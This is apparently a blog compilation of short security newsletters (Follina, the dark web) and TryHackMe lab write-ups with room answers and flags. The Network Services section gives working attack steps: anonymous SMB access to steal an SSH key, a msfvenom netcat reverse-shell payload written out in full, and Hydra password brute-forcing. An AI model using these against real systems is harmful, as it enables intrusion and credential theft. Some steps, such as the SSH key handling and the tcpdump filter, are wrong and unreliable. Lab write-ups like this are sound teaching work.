Welcome to DR's note, your weekly dose of knowledge from Circuit Stitch.

 Today we will talk about Follina 

                What is Follina?  Follina or CVE-2022-30190 is a zero-day exploit that uses Microsoft Word documents to execute Powershell code on your computer.  In the original document, the file has other hidden files inside of it by the use of compression, it is a .rar file.  So that once the document file is executed or run, you would reach out to a website to grab an HTML file.  This file would then run automatically, it would start a hidden command prompt window.  This hidden window would shut down the msdt (Microsoft Diagnostic Tool) program, it would then go through looking for a certain file that is encoded.  It would then save that file, decode that file, bring that file to the current directory, and execute a file called rgb.exe.  At the moment the rgb.exe file is unknown, meaning the infosec community isn’t sure what this file did, but what we do know is this is a form of RCE.

                 What is RCE?  RCE stands for remote code execution, it basically means that an attacker can create a file or program which I will refer to in the rest of this as a payload.  The payload will then be transferred over to someone else’s computer via any number of ways; i.e. email, USB stick, download, etc.  Once the payload is on the target system, it will need to be executed for the RCE to take effect.  Now RCE can be a lot of things, once it’s executed it could create a shell that gives the attacker access to your machine, it could execute ransomware, could add your machine to a bot-net (a future DR note), a bitcoin miner. Suffice it to say a lot can happen to your machine if it is run.

                 Do we need to worry about Follina?  Yes and no, at the time of writing this Microsoft is saying that it will be detected by Defender (Microsoft’s anti-virus) and will be labeled as “Mesdetty” and “Mesdetty Launch”.  Now let me explain why you should and shouldn’t worry about this.  Like all modern cyber threats, you should have concern enough to keep an eye out for it, but as of right now it doesn’t seem to be much of a threat because it hasn’t been used against anyone.  Not saying it won’t be used in the future but currently, it was pointed out that at the time of writing this no one has been a victim of this attack. 

                If you want to know more about Follina or CVE-2022-30190, check out my sources at the bottom of the email.  Also if you have any questions or if you have any topics you’d like me to discuss on a future DR note, please email me and let me know.  I hope everyone has a great week and Be Awesome!

Try Hack Me Network Services 2: Task 2 Understanding NFS

What is NFS?

NFS stands for "Network File System" and allows a system to share directories and files with others over a network. By using NFS, users and programs can access files on remote systems almost as if they were local files. It does this by mounting all, or a portion of a file system on a server. The portion of the file system that is mounted can be accessed by clients with whatever privileges are assigned to each file.

 

How does NFS work?

We don't need to understand the technical exchange in too much detail to be able to exploit NFS effectively- however if this is something that interests you, I would recommend this resource:  https://docs.oracle.com/cd/E19683-01/816-4882/6mb2ipq7l/index.html
First, the client will request to mount a directory from a remote host on a local directory just the same way it can mount a physical device. The mount service will then act to connect to the relevant mount daemon using RPC.
The server checks if the user has permission to mount whatever directory has been requested. It will then return a file handle which uniquely identifies each file and directory that is on the server.

If someone wants to access a file using NFS, an RPC call is placed to NFSD (the NFS daemon) on the server.  This call takes parameters such as:

•  The file handle
  
•  The name of the file to be accessed
  
•  The user's, user ID
  
•  The user's group ID
  

 

These are used in determining access rights to the specified file. This is what controls user permissions, I.E read and write of files.
 
What runs NFS?
Using the NFS protocol, you can transfer files between computers running Windows and other non-Windows operating systems, such as Linux, MacOS or UNIX.
A computer running Windows Server can act as an NFS file server for other non-Windows client computers. Likewise, NFS allows a Windows-based computer running Windows Server to access files stored on a non-Windows NFS server. 

More Information:
Here are some resources that explain the technical implementation, and working of, NFS in more detail than I have covered here. 

https://www.datto.com/library/what-is-nfs-file-share

 http://nfs.sourceforge.net/

 https://wiki.archlinux.org/index.php/NFS 

Answer the questions below 

To see the answer, just highlight the green area.

What does NFS stand for?

How to: This answer can be found in the Whats NFS paragraph above.

Answer: Network File System

 

What process allows an NFS client to interact with a remote directory as though it was a physical device?

How to: The answer to this question can be found in the How NFS works paragraph above.

Answer: mounting

Hint: What does your Operating System do to access a physical drive?

 

What does NFS use to represent files and directories on the server?

How to: The answer to this question can be found towards the end of the How NFS works paragraph above.

Answer: file handle

 

What protocol does NFS use to communicate between the server and client?

How to: The answer to this question can be found towards the end of the How NFS works paragraph above.

Answer: RPC

 

What two pieces of user data does the NFS server take as parameters for controlling user permissions? Format: parameter 1 / parameter 2

How to: The answer to this question can be found towards the end of the How NFS works paragraph above.

Answer: user id / group id

 

Can a Windows NFS server share files with a Linux client? (Y/N)

How to: The answer to this question can be found in the What runs NFS section.

Answer: Y

 

Can a Linux NFS server share files with a MacOS client? (Y/N)

How to: The answer to this question can be found in the What runs NFS section.

Answer: Y

 

What is the latest version of NFS? [released in 2016, but is still up to date as of 2020] This will require external research.

How to: I went to Google and searched "NFS version".  One of the entries that came up was for the wiki page for NFS (https://en.wikipedia.org/wiki/Network_File_System), I clicked on that entry and scrolled down to the different versions, I was able to find the answer in there.

Answer: 4.2

Welcome to DR's note, your weekly dose of knowledge from Circuit Stitch.

 This week we talk about the Dark Web.

    We hear about the dark web from different places like commercials trying to spook you into thinking your personal info is on it.  But let us look at Wikipedia, as I like the way the definition is on there.  The dark web is the World Wide Web content that exists on dark nets.  Dark nets are overlay networks that use the internet but require specific software, configurations, or authorization to access.  Basically, it means that the Dark Web exists in the same space as the regular internet that you know and love.  You can't get there though by just googling take me to the Dark Web, no, you need to install special software that will be able to take you to these dark nets.  One such software that you can download and install is called the Tor browser.  The Tor browser uses the Tor dark net to explore the different websites, there are other dark nets like Freenet, I2P, and Riffle.  To conclude this section, I think it is worth stating that there is a difference between the Dark Web and the Deep Web.  The Deep Web is parts of the web not indexed or searchable by search engines, basically, they want to remain as anonymous as possible and only if you know how to get to the address is how to get to it.  Most Deep websites aren't something you want to go to anyway.

    So, what type of content is on the Dark Web?  So, one of the most prolific things on the Dark Web is CP, that is all I am going to say, and will not be going into it further as it is not something that needs discussing here.  Next would be black markets where you can buy anything from fakes IDs, drugs, guns, cyber-attacks, and so much more.  You can also find social media, message boards, and bitcoin services.  Bitcoin is the currency of the Dark Web; the biggest reason also ties into why people use the Dark Web.

    Why do people use the Dark Web?  Anonymity, plain and simple.  When you access a dark net, your identity and location are anonymous to an extent.  With the encryption used you are by all accounts anonymous, but if you were to log into something like Facebook then it kind of defeats the purpose of using the Dark Web.  I mean you can create an account on other sites while using the Dark Web and still remain anonymous, but if you log into something that was created on the clear net (regular internet) then there was no reason why you even are using the Dark Web, I hope that made sense to you. 

    I hope this has opened your eyes to what the Dark Web is and taught you about what can happen just below the surface of your internet.  As always, if you have questions please comment below.  If you have any ideas for future DR notes, please let me know, I'd love to hear about them.  Thank you and have a great week.

Try Hack Me Network Services 2: Task 5 Understanding SMTP

What is SMTP?

SMTP stands for "Simple Mail Transfer Protocol". It is utilised to handle the sending of emails. In order to support email services, a protocol pair is required, comprising of SMTP and POP/IMAP. Together they allow the user to send outgoing mail and retrieve incoming mail, respectively.

The SMTP server performs three basic functions:

•  It verifies who is sending emails through the SMTP server.
•  It sends the outgoing mail
•  If the outgoing mail can't be delivered it sends the message back to the sender

Most people will have encountered SMTP when configuring a new email address on some third-party email clients, such as Thunderbird; as when you configure a new email client, you will need to configure the SMTP server configuration in order to send outgoing emails.

 

POP and IMAP

POP, or "Post Office Protocol" and IMAP, "Internet Message Access Protocol" are both email protocols who are responsible for the transfer of email between a client and a mail server. The main differences is in POP's more simplistic approach of downloading the inbox from the mail server, to the client. Where IMAP will synchronise the current inbox, with new mail on the server, downloading anything new. This means that changes to the inbox made on one computer, over IMAP, will persist if you then synchronise the inbox from another computer. The POP/IMAP server is responsible for fulfiling this process.

 

How does SMTP work?

Email delivery functions much the same as the physical mail delivery system. The user will supply the email (a letter) and a service (the postal delivery service), and through a series of steps- will deliver it to the recipients inbox (postbox). The role of the SMTP server in this service, is to act as the sorting office, the email (letter) is picked up and sent to this server, which then directs it to the recipient.

We can map the journey of an email from your computer to the recipient’s like this:

 

1. The mail user agent, which is either your email client or an external program. connects to the SMTP server of your domain, e.g. smtp.google.com. This initiates the SMTP handshake. This connection works over the SMTP port- which is usually 25. Once these connections have been made and validated, the SMTP session starts.

 

2. The process of sending mail can now begin. The client first submits the sender, and recipient's email address- the body of the email and any attachments, to the server.

 

3. The SMTP server then checks whether the domain name of the recipient and the sender is the same.

 

4. The SMTP server of the sender will make a connection to the recipient's SMTP server before relaying the email. If the recipient's server can't be accessed, or is not available- the Email gets put into an SMTP queue.

 

5. Then, the recipient's SMTP server will verify the incoming email. It does this by checking if the domain and user name have been recognised. The server will then forward the email to the POP or IMAP server, as shown in the diagram above.

 

6. The E-Mail will then show up in the recipient's inbox.

This is a very simplified version of the process, and there are a lot of sub-protocols, communications and details that haven't been included. If you're looking to learn more about this topic, this is a really friendly to read breakdown of the finer technical details- I actually used it to write this breakdown:

https://computer.howstuffworks.com/e-mail-messaging/email3.htm

 

What runs SMTP?

SMTP Server software is readily available on Windows server platforms, with many other variants of SMTP being available to run on Linux.

 

More Information:

Here is a resource that explain the technical implementation, and working of, SMTP in more detail than I have covered here.

https://www.afternerd.com/blog/smtp/

 

Answer the questions below

 

What does SMTP stand for?

How to: This can be found in the What is SMTP? section.

Answer: simple mail transfer protocol

 

What does SMTP handle the sending of? (answer in plural) 

How to: This can be found in the What is SMTP? section.

Answer: emails

 

What is the first step in the SMTP process?

How to: This can be found in the How does SMTP work? section. In the breakdown number 1.

Answer: SMTP handshake

 

What is the default SMTP port?

How to: This can be found in the How does SMTP work? section.  In the breakdown number 1.

Answer: 25

 

Where does the SMTP server send the email if the recipient's server is not available? 

How to: This can be found in the How does SMTP work? section.  In the breakdown number 4.

Answer: SMTP queue

 

On what server does the Email ultimately end up on?

How to: This can be found in the How does SMTP work? section.  In the breakdown number 5.

Answer: POP/IMAP

 

Can a Linux machine run an SMTP server? (Y/N) 

How to: This can be found in the What runs SMTP? section.

Answer: Y

 

Can a Windows machine run an SMTP server? (Y/N)

How to: This can be found in the What runs SMTP? section.

Answer: Y

 

Try Hack Me Network Services Write Up

To see the answer copy and paste it into notepad, I wanted to keep them hidden so if your looking for help you won't see the answer while trying to figure it out.

Task 1 Get Connected

Hello and welcome!

This room will explore common Network Service vulnerabilities and misconfigurations, but in order to do that, we'll need to do a few things first!

A basic knowledge of Linux, and how to navigate the Linux file system, is required for this room. If you think you'll need some help with this, try completing the 'Linux Fundamentals' Module (https://tryhackme.com/module/linux-fundamentals)

1. Connect to the TryHackMe OpenVPN Server (See https://tryhackme.com/access for help!)

2. Make sure you're sitting comfortably, and have a cup of Tea, Coffee or Water close!

Now, let's move on!



N.B. This is not a room on WiFi access hacking or hijacking, rather how to gain unauthorized access to a machine by exploiting network services. If you are interested in WiFi hacking, I suggest checking out WiFi Hacking 101 by NinjaJc01 ( https://tryhackme.com/room/wifihacking101)

Answer the Question:

Ready? Let's get going!

Answer: No answer needed



Task 2 Understanding SMB

What is SMB?

SMB - Server Message Block Protocol - is a client-server communication protocol used for sharing access to files, printers, serial ports and other resources on a network.

Servers make file systems and other resources (printers, named pipes, APIs) available to clients on the network. Client computers may have their own hard disks, but they also want access to the shared file systems and printers on the servers.

The SMB protocol is known as a response-request protocol, meaning that it transmits multiple messages between the client and server to establish a connection. Clients connect to servers using TCP/IP (actually NetBIOS over TCP/IP as specified in RFC1001 and RFC1002), NetBEUI or IPX/SPX.

How does SMB work?

Once they have established a connection, clients can then send commands (SMBs) to the server that allow them to access shares, open files, read and write files, and generally do all the sort of things that you want to do with a file system. However, in the case of SMB, these things are done over the network.

What runs SMB?

Microsoft Windows operating systems since Windows 95 have included client and server SMB protocol support. Samba, an open source server that supports the SMB protocol, was released for Unix systems.

Answer the questions below:

What does SMB stand for?

How to: Look above in the write up.
Answer: Server Message Block


What type of protocol is SMB?

How to: Again look above in the write up.
Answer: response-request


What do clients connect to servers using?

How to: Again look above in the write up.
Answer: TCP/IP


What systems does Samba run on?

How to: Again look above in the write up.
Answer: Unix



Task 3 Enumerating SMB

Lets Get Started

Before we begin, make sure to deploy the room and give it some time to boot. Please be aware, this can take up to five minutes so be patient!

Enumeration

Enumeration is the process of gathering information on a target in order to find potential attack vectors and aid in exploitation.

This process is essential for an attack to be successful, as wasting time with exploits that either don't work or can crash the system can be a waste of energy. Enumeration can be used to gather usernames, passwords, network information, hostnames, application data, services, or any other information that may be valuable to an attacker.

SMB

Typically, there are SMB share drives on a server that can be connected to and used to view or transfer files. SMB can often be a great starting point for an attacker looking to discover sensitive information — you'd be surprised what is sometimes included on these shares.

Port Scanning

The first step of enumeration is to conduct a port scan, to find out as much information as you can about the services, applications, structure and operating system of the target machine.

If you haven't already looked at port scanning, I recommend checking out the Nmap room here.

Enum4Linux

Enum4linux is a tool used to enumerate SMB shares on both Windows and Linux systems. It is basically a wrapper around the tools in the Samba package and makes it easy to quickly extract information from the target pertaining to SMB. It's installed by default on Parrot and Kali, however if you need to install it, you can do so from the official github.

The syntax of Enum4Linux is nice and simple: "enum4linux [options] ip"

TAG FUNCTION

-U get userlist
-M get machine list

-N get namelist dump (different from -U and-M)
-S get sharelist
-P get password policy information
-G get group and member list
-a all of the above (full basic enumeration)

Now we understand our enumeration tools, let's get started!

Answer the Questions below:

Conduct an nmap scan of your choosing, How many ports are open?

How to: I ran sudo nmap -sS -sV [IP of target machine]
Answer: 3

What ports is SMB running on?

How to: Look in the nmap scan.

Answer: 139/445

Let's get started with Enum4Linux, conduct a full basic enumeration.

For starters, what is the workgroup name?

How to: Look towards the top of the Enum4Linux scan you will see a Enumerating Workgroup/Domain on [IP of Target machine].
Answer: WORKGROUP

What comes up as the name of the machine?

How to: Scroll down on the Enum4Linux scan to the OS information on [IP of target machine] in it you will see the answer in this section.
Answer: POLOSMB
Hint: Look under OS information, it might be hard to spot!



What operating system version is running?

How to: Look at above section to find the answer to this question.
Answer: 6.1

What share sticks out as something we might want to investigate?

How to: Again in the Enum4Linux scan scroll down a couple sections to Share Enumeration on [IP of target Machine], in this section is where you will find the answer.
Answer: profiles

Task 4 Exploiting SMB

Types of SMB Exploit

While there are vulnerabilities such as CVE-2017-7494 that can allow remote code execution by exploiting SMB, you're more likely to encounter a situation where the best way into a system is due to misconfigurations in the system. In this case, we're going to be exploiting anonymous SMB share access- a common misconfiguration that can allow us to gain information that will lead to a shell.

Method Breakdown

So, from our enumeration stage, we know:
- The SMB share location
- The name of an interesting SMB share

SMBClient

Because we're trying to access an SMB share, we need a client to access resources on servers. We will be using SMBClient because it's part of the default samba suite. While it is available by default on Kali and Parrot, if you do need to install it, you can find the documentation here.

We can remotely access the SMB share using the syntax:
"smbclient //[IP]/[SHARE]"

Followed by the tags:
-U [name] : to specify the user
-p [port] : to specify the port

Got it? Okay, let's do this!

Answer the questions below:

What would be the correct syntax to access an SMB share called "secret" as user "suit" on a machine with the IP 10.10.10.2 on the default port?

How to: Use the write up above to figure out what options are needed and put together the proper command
Answer: smbclient //10.10.10.2/secret -U suit



Great! Now you've got a hang of the syntax, let's have a go at trying to exploit this vulnerability. You have a list of users, the name of the share (smb) and a suspected vulnerability.

How to: No answer needed
Answer: No answer needed



Lets see if our interesting share has been configured to allow anonymous access, I.E it doesn't require authentication to view the files. We can do this easily by:
- using the username "Anonymous"
- connecting to the share we found during the enumeration stage
- and not supplying a password.
Does the share allow anonymous access? Y/N?

How to: To come up with the command to use look at the first question, then use the command smbclient//[IP of target machine]/profile -U Anonymous , you will get the answer after running this command
Answer: Y



Great! Have a look around for any interesting documents that could contain valuable information. Who can we assume this profile folder belongs to?

How to: Once you are in use the command ls to list out what is in your current directory, you will see a file name
Answer: John Cactus



What service has been configured to allow him to work from home?

How to: You will see a folder named .ssh, it is the name of this folder that gives away what service is used to work from home.
Answer: ssh



Okay! Now we know this, what directory on the share should we look in?

How to: From the previous question tells you what directory you need to access.
Answer: .ssh



This directory contains authentication keys that allow a user to authenticate themselves on, and then access, a server. Which of these keys is most useful to us?

How to: You will have three choices here, the best way to think of it is your photo ID authenticates that you are you.
Answer: Id_rsa
Hint: What is the default name of an SSH identity file?

Download this file to your local machine, and change the permissions to "600" using "chmod 600 [file]".

Now, use the information you have already gathered to work out the username of the account.

Then, use the service and key to log-in to the server.

What is the smb.txt flag?

How to: To access the log in you will need to cat the id_rsa file, once you do that then you can use the command ssh john@[IP of target machine], hit enter.  When prompted for a password copy the id_rsa file that you cat earlier and past it into the password prompt.  You should have access, use the ls command to see what file are on the server.  Then you can cat smb.txt , which will give you the flag.
Answer: THM{smb_is_fun_eh?}



Task 5 Understanding Telnet

What is Telnet?

Telnet is an application protocol which allows you, with the use of a telnet client, to connect to and execute commands on a remote machine that's hosting a telnet server.

The telnet client will establish a connection with the server. The client will then become a virtual terminal- allowing you to interact with the remote host.

Replacement

Telnet sends all messages in clear text and has no specific security mechanisms. Thus, in many applications and services, Telnet has been replaced by SSH in most implementations.

How does Telnet work?

The user connects to the server by using the Telnet protocol, which means entering "telnet" into a command prompt. The user then executes commands on the server by using specific Telnet commands in the Telnet prompt. You can connect to a telnet server with the following syntax: "telnet [ip] [port]"

Answer the questions below:

What is Telnet?

How to: Look above in the write up.
Answer: application protocol



What has slowly replaced Telnet?

How to: Look above in the write up.
Answer: ssh



How would you connect to a Telnet server with the IP 10.10.10.3 on port 23?

How to: Look above in the write up.
Answer: telnet 10.10.10.3:23



The lack of what, means that all Telnet communication is in plaintext?

How to: For this question, if the text is not in plain text then it must be encrypted.
Answer: encryption
Hint: What does the modern internet use to communicate securely?



Task 6 Enumerating Telnet

Lets Get Started

Before we begin, make sure to deploy the room and give it some time to boot. Please be aware, this can take up to five minutes so be patient!

Enumeration

We've already seen how key enumeration can be in exploiting a misconfigured network service. However, vulnerabilities that could be potentially trivial to exploit don't always jump out at us. For that reason, especially when it comes to enumerating network services, we need to be thorough in our method.

Port Scanning

Let's start out the same way we usually do, a port scan, to find out as much information as we can about the services, applications, structure and operating system of the target machine. Scan the machine with nmap.

Output

Let's see what's going on on the target server…

Answer the questions below

How many ports are open on the target machine?

How to: Run the command sudo nmap -sV -p1-10000 [IP of target machine] , you need to scan above the 1000 to find the open port.
Answer: 1





What port is this?

How to: Look at the above nmap scan to see what the port number is.
Answer: 8012





This port is unassigned, but still lists the protocol it's using, what protocol is this?

How to: Look at the above nmap scan to see what the port number is.
Answer: tcp



Now re-run the nmap scan, without the -p- tag, how many ports show up as open?

How to: Run the command nmap , the output will give you your answer.
Answer: 0



Here, we see that by assigning telnet to a non-standard port, it is not part of the common ports list, or top 1000 ports, that nmap scans. It's important to try every angle when enumerating, as the information you gather here will inform your exploitation stage.

How to: No answer needed
Answer: No answer needed



Based on the title returned to us, what do we think this port could be used for?

How to: Look at the nmap scan from earlier you will see the words skidy's backdoor.
Answer: A Backdoor





Who could it belong to? Gathering possible usernames is an important step in enumeration.

How to: Look at the nmap scan from earlier you will see the words skidy's backdoor.
Answer: Skidy



Always keep a note of information you find during your enumeration stage, so you can refer back to it when you move on to try exploits.

How to: No answer needed
Answer: No answer needed

Task 7 Exploiting Telnet

Use the machine from the previous task to get the answers for this task.

Types of Telnet Exploit

Telnet, being a protocol, is in and of itself insecure for the reasons we talked about earlier. It lacks encryption, so sends all communication over plaintext, and for the most part has poor access control. There are CVE's for Telnet client and server systems, however, so when exploiting you can check for those on:

https://www.cvedetails.com/
https://cve.mitre.org/

A CVE, short for Common Vulnerabilities and Exposures, is a list of publicly disclosed computer security flaws. When someone refers to a CVE, they usually mean the CVE ID number assigned to a security flaw.

However, you're far more likely to find a misconfiguration in how telnet has been configured or is operating that will allow you to exploit it.



Method Breakdown

So, from our enumeration stage, we know:
- There is a poorly hidden telnet service running on this machine
- The service itself is marked "backdoor"
- We have possible username of "Skidy" implicated

Using this information, let's try accessing this telnet port, and using that as a foothold to get a full reverse shell on the machine!

Connecting to Telnet

You can connect to a telnet server with the following syntax:

"telnet [ip] [port]"

We're going to need to keep this in mind as we try and exploit this machine.

What is a Reverse Shell?

A "shell" can simply be described as a piece of code or program which can be used to gain code or command execution on a device.

A reverse shell is a type of shell in which the target machine communicates back to the attacking machine.

The attacking machine has a listening port, on which it receives the connection, resulting in code or command execution being achieved.

Answer the questions below

Okay, let's try and connect to this telnet port! If you get stuck, have a look at the syntax for connecting outlined above.

How to: No answer needed
Answer: No answer needed

Great! It's an open telnet connection! What welcome message do we receive?

How to: Look in the write up above at the telnet syntax, make sure there is a space between IP address and port instead of a colon
Answer: SKIDY'S BACKDOOR.
Hint: Remember, telnet is not running on its default port. Use your answer from task 6, question 2.



Let's try executing some commands, do we get a return on any input we enter into the telnet session? (Y/N)

How to: If you run the command .HELP it will give you what command you can run, if you try and run the .RUN command nothing happens so you get your answer
Answer: N



Hmm... that's strange. Let's check to see if what we're typing is being executed as a system command.
How to: No answer needed
Answer: No answer needed

Start a tcpdump listener on your local machine.

If using your own machine with the OpenVPN connection, use:

sudo tcpdump ip proto [IP of target machine] -i tun0

If using the AttackBox, use:

sudo tcpdump ip proto [IP of target machine] -i eth0

This starts a tcpdump listener, specifically listening for ICMP traffic, which pings operate on.

How to: No answer needed
Answer: No answer needed

Now, use the command "ping [local THM ip] -c 1" through the telnet session to see if we're able to execute system commands. Do we receive any pings? Note, you need to preface this with .RUN (Y/N)

How to: Make sure the tcpdump listener is running on the attacking machine before running the next command, then use the command .RUN ping [IP of Attacking Machine] -c 1
Answer: Y

Great! This means that we are able to execute system commands AND that we are able to reach our local machine. Now let's have some fun!

How to: No answer needed
Answer: No answer needed

We're going to generate a reverse shell payload using msfvenom.This will generate and encode a netcat reverse shell for us. Here's our syntax:

"msfvenom -p cmd/unix/reverse_netcat lhost=[local tun0 ip] lport=4444 R"

-p = payload
lhost = our local host IP address (this is your machine's IP address)
lport = the port to listen on (this is the port on your machine)
R = export the payload in raw format

What word does the generated payload start with?

How to: Run the above command on the attack machine to create a raw format payload file to create a reverse shell from the target machine to the attack machine. After the line with payload size the first word is the answer to this question.
Answer: mkfifo

Perfect. We're nearly there. Now all we need to do is start a netcat listener on our local machine. We do this using:

"nc -lvp [listening port]"
What would the command look like for the listening port we selected in our payload?

How to: Just copy the code snippet from above, when you get to the part that is the listening port add the port number from lport in the msfvenom payload command.
Answer: nc -lvp 4444

Great! Now that's running, we need to copy and paste our msfvenom payload into the telnet session and run it as a command. Hopefully- this will give us a shell on the target machine!

How to: No answer needed
Answer: No answer needed

Success! What is the contents of flag.txt?

How to: To be able to get the flag you will need to copy the raw file that you created using msfvenom, this is what mine created mkfifo /tmp/kqlirqy; nc 10.6.1.235 4444 0</tmp/kqlirqy | /bin/sh >/tmp/kqlirqy 2>&1; rm /tmp/kqlirqy , after you have copied your payload file and have your nc listening type .RUN [Payload command] into the target machine. Hit enter, once you do you should see a shell pop over on your attacking machine in the terminal with nc listening. You can type ls to see that your in the directory that has the flag.txt. Type cat flag.txt to get your answer.
Answer: THM{y0u_g0t_th3_t3ln3t_fl4g}

Task 8 Understanding FTP

What is FTP?

File Transfer Protocol (FTP) is, as the name suggests , a protocol used to allow remote transfer of files over a network. It uses a client-server model to do this, and- as we'll come on to later- relays commands and data in a very efficient way.

How does FTP work?

A typical FTP session operates using two channels:
a command (sometimes called the control) channel
a data channel.

As their names imply, the command channel is used for transmitting commands as well as replies to those commands, while the data channel is used for transferring data.

FTP operates using a client-server protocol. The client initiates a connection with the server, the server validates whatever login credentials are provided and then opens the session.

While the session is open, the client may execute FTP commands on the server.

Active vs Passive

The FTP server may support either Active or Passive connections, or both.
In an Active FTP connection, the client opens a port and listens. The server is required to actively connect to it.
In a Passive FTP connection, the server opens a port and listens (passively) and the client connects to it.

This separation of command information and data into separate channels is a way of being able to send commands to the server without having to wait for the current data transfer to finish. If both channels were interlinked, you could only enter commands in between data transfers, which wouldn't be efficient for either large file transfers, or slow internet connections.

More Details:

You can find more details on the technical function, and implementation of, FTP on the Internet Engineering Task Force website: https://www.ietf.org/rfc/rfc959.txt. The IETF is one of a number of standards agencies, who define and regulate internet standards.

Answer the questions below

What communications model does FTP use?

How to: Read the write up above to find the answer.
Answer: Client-Server



What's the standard FTP port?

How to: The simplest way to figure this out is just to google it.

Answer: 21



How many modes of FTP connection are there?

How to: Click on the link to go to the IETF page about FTP, press ctrl + F. In the search box type in transmission modes, you will see 5 places that transmission modes appear on the page. If you go down about a quarter of the way you will find the section transmission modes, it is on page 21. You will find your answer there.
Answer: 2

Task 9 Enumerating FTP

Lets Get Started
Before we begin, make sure to deploy the room and give it some time to boot. Please be aware, this can take up to five minutes so be patient!

Enumeration

By now, I don't think I need to explain any further how enumeration is key when attacking network services and protocols. You should, by now, have enough experience with nmap to be able to port scan effectively. If you get stuck using any tool- you can always use "tool [-h / -help / --help]" to find out more about it's function and syntax. Equally, man pages are extremely useful for this purpose. They can be reached using "man [tool]".

Method

We're going to be exploiting an anonymous FTP login, to see what files we can access- and if they contain any information that might allow us to pop a shell on the system. This is a common pathway in CTF challenges, and mimics a real-life careless implementation of FTP servers.

Resources

As we're going to be logging in to an FTP server, we will need to make sure an FTP client is installed on the system. There should be one installed by default on most Linux operating systems, such as Kali or Parrot OS. You can test if there is one by typing "ftp" into the console. If you're brought to a prompt that says: "ftp>", then you have a working FTP client on your system. If not, it's a simple matter of using "sudo apt install ftp" to install one.

Alternative Enumeration Methods

It's worth noting that some vulnerable versions of in.ftpd and some other FTP server variants return different responses to the "cwd" command for home directories which exist and those that don’t. This can be exploited because you can issue cwd commands before authentication, and if there's a home directory- there is more than likely a user account to go with it. While this bug is found mainly within legacy systems, it's worth knowing about, as a way to exploit FTP.

This vulnerability is documented at: https://www.exploit-db.com/exploits/20745

Now we understand our toolbox, let's do this.

Answer the questions below

Run an nmap scan of your choice.

How many ports are open on the target machine?

How to: On your attack machine use this command sudo nmap -sS -sV -p1-10000 [IP of target machine] , wait for it to run. After about a minute you should have your answer in the nmap scan result.
Answer: 2

What port is ftp running on?

How to: Consulate the nmap scan to find the answer.
Answer: 21

What variant of FTP is running on it?

How to: Consulate the nmap scan to find the answer.
Answer: vsftpd

Great, now we know what type of FTP server we're dealing with we can check to see if we are able to login anonymously to the FTP server. We can do this using by typing "ftp [IP]" into the console, and entering "anonymous", and no password when prompted.

What is the name of the file in the anonymous FTP directory?

How to: On your attack machine type in the command ftp [IP of target machine] and hit enter, you will be prompted with name (IP of target machine : name of attack machine). Enter anonymous into the terminal on the attack machine, hit enter, you will be asked for a password, just hit enter again. You should now be in the ftp server, you can tell because the terminal name should now say ftp> , type in the command ls , this will give you the answer to this question.
Answer: PUBLIC_NOTICE.txt

What do we think a possible username
could be?

How to: In the ftp> , use the command help to see what all command you can run on the ftp server. Then use the command more PUBLIC_NOTICE.txt . It will open up the file and at the bottom of the file is the answer to this question.
Answer: Mike

Great! Now we've got details about the FTP server and, crucially, a possible username. Let's see what we can do with that…

How to: No Answer is needed
Answer: No Answer is needed

Task 10 Exploiting FTP

Types of FTP Exploit

Similarly to Telnet, when using FTP both the command and data channels are unencrypted. Any data sent over these channels can be intercepted and read.

With data from FTP being sent in plaintext, if a man-in-the-middle attack took place an attacker could reveal anything sent through this protocol (such as passwords). An article written by JSCape demonstrates and explains this process using ARP-Poisoning to trick a victim into sending sensitive information to an attacker, rather than a legitimate source.

When looking at an FTP server from the position we find ourselves in for this machine, an avenue we can exploit is weak or default password configurations.

Method Breakdown

So, from our enumeration stage, we know:
- There is an FTP server running on this machine
- We have a possible username

Using this information, let's try and bruteforce the password of the FTP Server.

Hydra

Hydra is a very fast online password cracking tool, which can perform rapid dictionary attacks against more than 50 Protocols, including Telnet, RDP, SSH, FTP, HTTP, HTTPS, SMB, several databases and much more. Hydra comes by default on both Parrot and Kali, however if you need it, you can find the GitHub here.

The syntax for the command we're going to use to find the passwords is this:

"hydra -t 4 -l dale -P /usr/share/wordlists/rockyou.txt -vV 10.10.10.6 ftp"



Let's break it down:
SECTION FUNCTION
hydra Runs the hydra tool
-t 4 Number of parallel connections per target
-l [user] Points to the user who's account you're trying to compromise
-P [path to dictionary] Points to the file containing the list of possible passwords
-vV Sets verbose mode to very verbose, shows the login+pass combination for each attempt
[machine IP] The IP address of the target machine
ftp / protocol Sets the protocol

Let's crack some passwords!

Answer the questions below

What is the password for the user "mike"?

How to: On your attack machine use the hydra command Try Hack Me gave you above with a little modification, here is what I used hydra -t 4 -l mike -P /usr/share/wordlists/rockyou.txt [IP of target machine] ftp . After running this command hydra will run and find the password you will need to log into the ftp server.
Answer: password

Bingo! Now, let's connect to the FTP server as this user using "ftp [IP]" and entering the credentials when prompted

How to: No answer needed.
Answer: No answer needed

What is ftp.txt?

How to: After you have used the password you got from running hydra, and have logged into the ftp server. Use the ls command to see what is on this server, you will see the ftp.txt file. To view this file use the command more ftp.txt . This will open the file and give you the flag.
Answer: THM{y0u_g0t_th3_ftp_fl4g}



From <https://tryhackme.com/room/networkservices>